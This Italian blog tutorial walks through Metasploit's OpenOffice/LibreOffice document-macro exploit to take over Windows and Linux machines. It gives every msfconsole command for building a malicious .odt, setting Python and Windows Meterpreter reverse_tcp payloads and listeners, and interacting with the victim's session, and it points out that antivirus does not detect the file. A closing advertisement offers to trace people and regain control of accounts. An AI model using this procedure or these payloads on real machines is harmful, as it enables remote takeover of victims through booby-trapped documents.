Hacking Windows e Linux sfruttando le macro di OpenOffice con Metasploit

In questo articolo presento l’ennesimo modulo di Metasploit. La particolarità di questo exploit è che, oltre ad essere relativamente recente, può essere utilizzato sia per attaccare una vittima Windows (anche Windows 10), sia contro un PC Linux, il che lo rende molto versatile. Sfrutta una vulnerabilità di OpenOffice e funziona anche con LibreOffice, le due suite di programmi open source da utilizzare come alternative al celebre Office di Microsoft. Nello specifico l’exploit in questione apre una connessione con la macchina attaccante grazie alle macro,  procedure, ovvero insiemi di istruzioni, che servono per automatizzare una serie di azioni all’apertura di un file.

Ambiente di test

  • Attacker: Kali Linux Rolling con indirizzo IP su LAN 192.168.1.5
  • Vittima Linux: Debian 8 Jessie su VMWare Workstation Player
  • Vittima Windows: Windows 7 Service Pack 1 su VMWare Workstation Player

Sembra scontato, ma affinché riusciamo ad utilizzare con successo questo exploit, è necessario che le vittime abbiano abilitato l’esecuzione delle macro su OpenOffice o LibreOffice.

Avviamo il database postgresql e msfconsole

service postgresql start msfconsole

e cambiamo il contesto di Metasploit per utilizzare l’exploit dedicato alle macro di OpenOffice

use exploit/multi/misc/openoffice_document_macro

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Hacking Linux

Iniziamo prendendo il controllo del PC Linux con Debian Jessie. Di default Debian viene distribuito con LibreOffice installato: non c’è problema l’exploit funzionerà anche su questo software.

Configuriamo l’exploit come segue, utilizzando come payload un reverse tcp in python, e lo lanciamo

set SRVHOST [indirizzo_ip_attacker] set FILENAME [nome_file.odt] set TARGET 1 set PAYLOAD python/meterpreter/reverse_tcp set LHOST [indirizzo_ip_attacker] run

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Metasploit si occupa di creare il file odt contenente le macro malevole, avviare il server per la consegna del payload e il listener sulla macchina attaccante.

 

Trasferiamo il file odt sulla vittima

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

e lo apriamo consentendo all’attacker la consegna e l’esecuzione del payload

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

digitando il comando jobs vediamo l’exploit, mentre con il comando sessions -l possiamo vedere la sessione attiva

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

iniziamo l’interazione con la sessione di Meterpreter con il comando sessions -i [numero_sessione], infine il comando sysinfo ci conferma la riuscita del procedimento

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Hacking Windows

Il procedimento è molto simile al precedente, fatta eccezione per il payload. Sebbene io l’abbia testata su Windows 7, dovrebbe funzionare senza intoppi anche su Windows 10.

Ripartiamo configurando e lanciando l’exploit

set SRVHOST [indirizzo_ip_attacker] set FILENAME [nome_file.odt] set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [indirizzo_ip_attacker] run

Non avendo specificato il TARGET, l’exploit lo imposta automaticamente su Windows, quello di default

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

Trasferiamo il file sulla vittima

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

Questo exploit su Windows risulta particolarmente efficace, perché anche se scansioniamo il file con un buon software antivirus, non viene rilevata nessuna minaccia, insomma il file viene considerato sicuro

Hacking Windows e Linux con OpenOffice Macro e Metasploit

 

Apriamo il file sulla vittima e ancora una volta elenchiamo le sessioni attive, iniziamo l’interazione con la sessione di Meterpreter e ci accertiamo che tutto funzioni correttamente

sessions -l sessions -i [numero_sessione] sysinfo

Hacking Windows e Linux con OpenOffice Macro e Metasploit

Baty’s Base


Stai cercando prodotti per l’hacking, la sicurezza informatica e il penetration testing? Hai bisogno di bonificare il tuo smartphone, il tuo pc o il tuo sito da virus e malware? Devi rintracciare una persona o recuperare delle informazioni urgenti? Devi riprendere possesso di un account, una mail o di una password che ti hanno sottratto? Vuoi acquistare device già configurati per sperimentare tutte le tecniche di hacking in modo facile e veloce? Hai esigenze particolari in ambito software o hardware? Possiamo aiutarti!

Contattaci subito per avere un aiuto immediato : dettagliaci tramite mail o Whatsapp che tipo di supporto ti occorre e ti invieremo un riscontro immediato!

Compila e invia il modulo qui sotto per inviarci subito una richiesta di supporto

Scrivi il tuo indirizzo email qui

Scrivi qui come possiamo aiutarti - ti supportiamo immediatamente per ogni tua esigenza!

chevron_left
chevron_right